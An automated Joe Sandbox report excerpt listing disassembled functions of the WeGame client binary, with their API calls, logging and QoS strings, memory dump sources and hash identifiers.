                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CrashReport$?get_client_version_type@overseas@ierd_tgp@@Loader@crash_report@@SimpleString::operator=$?is_static_detail_log@common@ierd_tgp@@?stamp_point@@CallbackHelperId@common@ierd_tgp@@Info@@@Init@Instance@LastLoginedUtagV12@Wegame
                                                                • String ID: CrashReportLoaderInit end$WeGameX
                                                                • API String ID: 2291668861-1424904570
                                                                • Opcode ID: 1c60e7f09385318fd6365ecbf56c54c86e23930f7bd961c6f303c6834e3b2dca
                                                                • Instruction ID: 117f11a671e5a06bc21661460d0d9bfe5c2d3c85eeb14aafc55b3ca506044100
                                                                • Opcode Fuzzy Hash: 1c60e7f09385318fd6365ecbf56c54c86e23930f7bd961c6f303c6834e3b2dca
                                                                • Instruction Fuzzy Hash: ED216570D00309EBCB04EBB6C856ADDB7B4AF14318F60816EE015B71D1DB781A09CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00463FEA Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00459C66: __EH_prolog3.LIBCMT ref: 00459C6D
                                                                  • Part of subcall function 00469DFB: __EH_prolog3_GS.LIBCMT ref: 00469E02
                                                                  • Part of subcall function 00453EC1: __EH_prolog3.LIBCMT ref: 00453EC8
                                                                  • Part of subcall function 00453EC1: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453EDF
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,log), ref: 00464070
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000000,?,00000000,00000000,?,00000001,06400000,00000000,00000150), ref: 004640A0
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?,?,?,?,?,?,?,?,?,?,00463C2D,00000000,00459F4F), ref: 004640AE
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 00452DC2: __EH_prolog3.LIBCMT ref: 00452DC9
                                                                  • Part of subcall function 00450D26: __EH_prolog3.LIBCMT ref: 00450D2D
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00464139
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(tcls/log), ref: 00464155
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON ref: 004641C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?get_log_instance@base@@AsyncLogger@1@PushTask@common@ierd_tgp@@V?$function@$$Z@std@@$??_0path@filesystem@ierd_tgp@@?is_static_detail_log@common@ierd_tgp@@H_prolog3_Init@locale@std@@Locimp@12@_V012@_invalid_parameter_noinfo_noreturn
                                                                • String ID: !$is_crypt$tcls/log
                                                                • API String ID: 712499144-3576253943
                                                                • Opcode ID: 225f6d1e068b9b8bd53591bfd51257c005e365724581420f29c93a441d93042e
                                                                • Instruction ID: 1a694c70eb324331ee8e602bbad02992a19ec3f91f8f56e6820eef889782fb34
                                                                • Opcode Fuzzy Hash: 225f6d1e068b9b8bd53591bfd51257c005e365724581420f29c93a441d93042e
                                                                • Instruction Fuzzy Hash: FB51BC70D0124CEADB09EBA5CD96BDDBBB5AF14308F1441DEE1052B282EB781F48DB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9B98A Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 133sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9B994
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000110), ref: 6BD9B99B
                                                                • GetTickCount.KERNEL32 ref: 6BD9B9FA
                                                                • GetTickCount.KERNEL32 ref: 6BD9BA18
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD9BA43
                                                                • Sleep.KERNEL32(00000064), ref: 6BD9BB4B
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                Strings
                                                                • [Qos_http_handler] worker start, xrefs: 6BD9B9DB
                                                                • [Qos_http_handler] wait for timeout,counting_stop_ms=%u, xrefs: 6BD9BA92
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9B9BF, 6BD9BA6F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@CountLogger@1@Tick$H_prolog3H_prolog3_Sleep
                                                                • String ID: [Qos_http_handler] wait for timeout,counting_stop_ms=%u$[Qos_http_handler] worker start$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                                                • API String ID: 3273642127-1390458660
                                                                • Opcode ID: aaed7f8a732ab35356c69a5b7f65b7a81491b14ebadefba3e158d18b7ae8b5f4
                                                                • Instruction ID: c895fc9ba3cecb5143c025b8612846adde89caad20a7a1276e86b7a9e2914d32
                                                                • Opcode Fuzzy Hash: aaed7f8a732ab35356c69a5b7f65b7a81491b14ebadefba3e158d18b7ae8b5f4
                                                                • Instruction Fuzzy Hash: BB510E30A04305DACB19EB74DA62BDCBBB29F51328F20049CC156AF2D1DB7C9B49CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046324E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00463258
                                                                  • Part of subcall function 00461579: __EH_prolog3_GS.LIBCMT ref: 00461583
                                                                  • Part of subcall function 00461579: memset.VCRUNTIME140(?,00000000,00000208,00000214,0046A105,?,85A35C35,?,?,?,?,?,0047B8A9,000000FF), ref: 004615A6
                                                                  • Part of subcall function 00461579: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004615BB
                                                                  • Part of subcall function 00461579: PathRemoveFileSpecW.SHLWAPI(?), ref: 004615C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • GetPrivateProfileStringW.KERNEL32(cmd_launcher_info,launcher,00485D1C,?,00000410,?), ref: 00463355
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00463368
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 00463375
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046337C
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • launcher, xrefs: 0046334B
                                                                • cmd_launcher_info, xrefs: 00463350
                                                                • [main]read_cmd_launcher_info, get launcher from cmd_start_for, launcher = %s, xrefs: 004633C2
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004633A0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: FileH_prolog3_$?get_log_instance@base@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@H_prolog3Logger@1@ModuleNamePathPrivateProfileRemoveSimpleSpecStringString::operator=U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@_invalid_parameter_noinfo_noreturnmemset
                                                                • String ID: [main]read_cmd_launcher_info, get launcher from cmd_start_for, launcher = %s$cmd_launcher_info$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$launcher
                                                                • API String ID: 3879750388-780307634
                                                                • Opcode ID: 92b3c71d2a8a311c883c812a8f7228761a513328d007022e599a53a8104633e2
                                                                • Instruction ID: 311cc247819494e763e034a77bd011014dbc2df06ad4b8a0469c100330fe4a74
                                                                • Opcode Fuzzy Hash: 92b3c71d2a8a311c883c812a8f7228761a513328d007022e599a53a8104633e2
                                                                • Instruction Fuzzy Hash: 5A413970D012589ADB20EF65CC91B9EBBF4BF14704F5484EEA089A7281DF785B84CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004631E1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004631E8
                                                                • OutputDebugStringA.KERNEL32([TGP]ReadBugRptConfig.,0000001C), ref: 004631F2
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON ref: 004631F8
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 00463201
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(?), ref: 00463214
                                                                • GetPrivateProfileIntW.KERNEL32(BugRpt,report_qos,00000001,?), ref: 00463231
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Application@common@ierd_tgp@@$??_0path@filesystem@ierd_tgp@@?get_workingdir_path_ex@?instance@DebugH_prolog3_OutputPrivateProfileStringV012@V123@Vpath@filesystem@3@
                                                                • String ID: BugRpt$[TGP]ReadBugRptConfig.$report_qos
                                                                • API String ID: 3418139206-2276067687
                                                                • Opcode ID: 615908025b742065004b269952b26561cc4095b9d4c3989554e3eb3e872bd347
                                                                • Instruction ID: c29df4b3525edff526eae1d687fd3d0c04a53cddad91b234e09ca61814946adb
                                                                • Opcode Fuzzy Hash: 615908025b742065004b269952b26561cc4095b9d4c3989554e3eb3e872bd347
                                                                • Instruction Fuzzy Hash: 75F09A30E502089BDB40FFF1C806ADCBBB0AF54328F50442AE210B2080FB788244CB6E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD0FD30 Relevance: 15.3, APIs: 10, Instructions: 254COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FDFA
                                                                • memset.VCRUNTIME140(00000010,?,00000000,00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FE08
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,0000000F), ref: 6BD0FE4B
                                                                • memmove.VCRUNTIME140(00000000,?,00000000,?,00000000,0000000F), ref: 6BD0FE53
                                                                • memset.VCRUNTIME140(7FFFFFFF,?,00000000,00000000,?,00000000,?,00000000,0000000F), ref: 6BD0FE5F
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 6BD0FF43
                                                                • memmove.VCRUNTIME140(00000010,00000000,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 6BD0FF51
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 6BD0FF94
                                                                • memmove.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 6BD0FF9C
                                                                • memmove.VCRUNTIME140(7FFFFFFF,00000000,?,00000000,?,00000000,?,00000000), ref: 6BD0FFA8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturnmemset$malloc
                                                                • String ID:
                                                                • API String ID: 1092852243-0
                                                                • Opcode ID: d3a5fbec11ef3d61ad83561e84cb6a1987f37c133fc78a52b68b8495f4e0dd25
                                                                • Instruction ID: 5a3e6ea8c76e85d48f6e1dfe0d9052cf7c1637c05ad4058f91d21e9d95d95043
                                                                • Opcode Fuzzy Hash: d3a5fbec11ef3d61ad83561e84cb6a1987f37c133fc78a52b68b8495f4e0dd25
                                                                • Instruction Fuzzy Hash: BD812472A001059FCB05CF6CDC8059EBBA6FF99360B2006A9EC04DB351DB34DE2697E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD36A14 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 213COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6BD3444F: __EH_prolog3.LIBCMT ref: 6BD34456
                                                                • ?c_str@path@filesystem@ierd_tgp@@QBEPB_WXZ.COMMON(?,?,00000000), ref: 6BD36AEA
                                                                • ~refcount_ptr.LIBCPMT ref: 6BD36AFD
                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BD36B02
                                                                  • Part of subcall function 6BD33743: __EH_prolog3.LIBCMT ref: 6BD3374A
                                                                • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000), ref: 6BD36BDC
                                                                • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000000), ref: 6BD36C74
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: DebugH_prolog3OutputString$?c_str@path@filesystem@ierd_tgp@@abort~refcount_ptr
                                                                • String ID: Pj#$forced abort due to illegal log prefix [{}]$A
                                                                • API String ID: 3296511426-3686375832
                                                                • Opcode ID: 02962f91328e7826f4ab37eb893c31a21ba895895d7421a05d8f3ecbbaed4b14
                                                                • Instruction ID: b0708c20695e89983fe7bda9586e89d57eac2e53a2f1c7f991904ea008c74365
                                                                • Opcode Fuzzy Hash: 02962f91328e7826f4ab37eb893c31a21ba895895d7421a05d8f3ecbbaed4b14
                                                                • Instruction Fuzzy Hash: 01818271908288EFDF14DBF4C945BDE7BB89F16328F144098D001AB292DB799B09DB72
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9A880 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9A88A
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,00000140), ref: 6BD9A92D
                                                                  • Part of subcall function 6BD9A178: __EH_prolog3.LIBCMT ref: 6BD9A17F
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(00000000,00000001), ref: 6BD9A970
                                                                  • Part of subcall function 6BD95CE6: __EH_prolog3_GS.LIBCMT ref: 6BD95CF0
                                                                  • Part of subcall function 6BD95CE6: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95CFF
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD9A984
                                                                Strings
                                                                • failed, xrefs: 6BD9A9DD
                                                                • [Qos_http_handler] qos report %s: qos_id=%d, seq=%d, response_code=%d, total_time=%.3f, conn_time=%.3f, xrefs: 6BD9A9CF
                                                                • success, xrefs: 6BD9A9EC
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9A9B0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3_Logger@1@$?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?report@H_prolog3Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@
                                                                • String ID: [Qos_http_handler] qos report %s: qos_id=%d, seq=%d, response_code=%d, total_time=%.3f, conn_time=%.3f$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp$failed$success
                                                                • API String ID: 3901038974-3525620919
                                                                • Opcode ID: 78f6f1e84a7c4af97d2d23b8ab60d3cbd76b2248cbeebe415eacd4021480c31a
                                                                • Instruction ID: d9ab4816ed64483a5a7177ddc38b026a650f4772207059317a24b85db2cd38c7
                                                                • Opcode Fuzzy Hash: 78f6f1e84a7c4af97d2d23b8ab60d3cbd76b2248cbeebe415eacd4021480c31a
                                                                • Instruction Fuzzy Hash: 9F51BC72C10208DBDF19EB64C892BEDB3B5AF59324F1042D8E5096F190EB789F85CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046405B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,log), ref: 00464070
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000000,?,00000000,00000000,?,00000001,06400000,00000000,00000150), ref: 004640A0
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?,?,?,?,?,?,?,?,?,?,00463C2D,00000000,00459F4F), ref: 004640AE
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 00452DC2: __EH_prolog3.LIBCMT ref: 00452DC9
                                                                  • Part of subcall function 00450D26: __EH_prolog3.LIBCMT ref: 00450D2D
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00464139
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(tcls/log), ref: 00464155
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON ref: 004641C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?get_log_instance@base@@AsyncLogger@1@PushTask@common@ierd_tgp@@V?$function@$$Z@std@@$??_0path@filesystem@ierd_tgp@@?is_static_detail_log@common@ierd_tgp@@V012@_invalid_parameter_noinfo_noreturn
                                                                • String ID: !$tcls/log
                                                                • API String ID: 2928327206-1193755044
                                                                • Opcode ID: 5a7ac797c5e311da9716c935e4fbae2a43ec661ed99204d6ae5e42170f70c772
                                                                • Instruction ID: b9422f427fa14e6ff2742c203bcdb59332eca162ceb41a28bb2874148cfe96b8
                                                                • Opcode Fuzzy Hash: 5a7ac797c5e311da9716c935e4fbae2a43ec661ed99204d6ae5e42170f70c772
                                                                • Instruction Fuzzy Hash: C6419E70D01248EBDB08EBA5CD96BDDBBB5AF15308F1441DDE10527282EB782F49CB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004586D5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 004586DC
                                                                  • Part of subcall function 0046172D: GetCurrentProcessId.KERNEL32(?,?,004586E8,00000004,00401D82), ref: 0046172F
                                                                  • Part of subcall function 0046172D: memset.VCRUNTIME140(5664TPF_Share_Mem,00000000,00000040,?,?,004586E8,00000004,00401D82), ref: 00461741
